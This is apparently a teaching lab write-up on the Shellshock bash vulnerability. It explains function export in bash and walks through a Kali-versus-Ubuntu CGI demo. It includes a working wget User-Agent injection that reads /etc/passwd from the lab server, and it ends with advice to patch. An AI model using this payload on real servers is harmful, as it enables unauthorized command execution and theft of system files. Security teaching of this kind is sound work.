CVE-2014-6271 Shellshock
Background and Vulnerability
# Shell variables
t="hi there"
echo $t
# Not there in subshell
bash
echo $t
exit
# Made available to subshell via
echo $t
export t
bash
echo $t
exit
# stop exporting
export -n t
# function declaration
fn() { echo "test"; }
fn
# function not exported to subshell
bash
fn
exit
# Export function via
export -f fn
bash
fn
exit
# Exported functions converted to environment variables and then
# 'executed' in the subshell
# consider
fn='() { echo "direct" ; }'
# this does not define a function in the current shell, but in
# subshell, this will be confused with an exported function
# and so executed.
# last piece: when importing functions bash executes the complete string associated
# with the function definition
fn() { echo "test"; }; echo "this is bad";
export ex='() { echo "function ex" ; }; echo "this is bad"; '
# above will be confused with an exported function, the echo will be executed
# An Exploit:
# Linux vulnerable to shellshock, with apache, insecure default with CGI enabled and
# a bash CGI script
Above is extracted and modified from What does env x='() { :;}; command' bash do and why is it insecure?
The Exploit (Demo)
The demo outlined below exploits web server running a vulnerable (to shellshock) version of bash.
The server is running apache and CGI, using a bash script as the executable CGI script. The results of the exploit will
be the transmission, from server to attacking client, of /etc/passwd.
- Run the Ubuntu804Server1, and Kali1 virtual machines
- Some background on CGI: The CGI protocol enables a web server to serve dynamic content via any server side executable.
The http protocol is used by a browser to communicate with a server. The server understands the http request
and sees that dynamic content is requested via an executable program. The server creates an environment
(setting up environment variables etc.) and then runs the target executable.
To see this in action, point the Kali1 browser at environment.cgi.
The response, displayed in the browser, is the environment, created by Apache, for the execution of environment.cgi.
The code is in
Ubuntu804Server1:/usr/lib/cgi-bin/environment.cgi
, or you can view it here.
- The vulnerable application is a simple 'hello world' bash script.
Point the Kali1 browser at shellshock.cgi to see it function normally.
The code is in
Ubuntu804Server1:/usr/lib/cgi-bin/shellshock.cgi
, or you van view it here.
- wget is a standard unix command (man wget) which plays the role of a browser. It can issue an http request,
and save the response in a file. Useful for scraping a website (downloading the website contents).
Try
wget http://192.168.0.100/cgi-bin/shellshock.cgi
from Kali.
- wget can also send http headers which will be used to set environment variables in the case of a CGI request. The -H option to wget
allows one to specify the http User-Agent header to the server. This, in turn, becomes the HTTP_USER_AGENT environment variable.
Try
wget -U "ArnoldsBrowser" http://192.168.0.100/cgi-bin/environment.cgi
from Kali and note the USER-AGENT
environment variable.
- The following combines the vulnerability with the CGI discussion above to fetch the passwd file from the server.
wget -U "() { :;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://192.168.0.100/cgi-bin/shellshock.cgi
/usr/lib/cgi-bin/environment.cgi
and /usr/lib/cgi-bin/shellshock.cgi
.
Above is modified from Attacks and Patches.
Notes
- This version of ubuntu comes with cgi enabled by default for /cgi-bin/. Not a secure default!
- How bad can it get? Attacker can cause the server to download and install code.
- The above is not the only possible exploit against this vulnerability.
Mitigation
Patch! Most versions of Linux have bash patched at this point.
Other references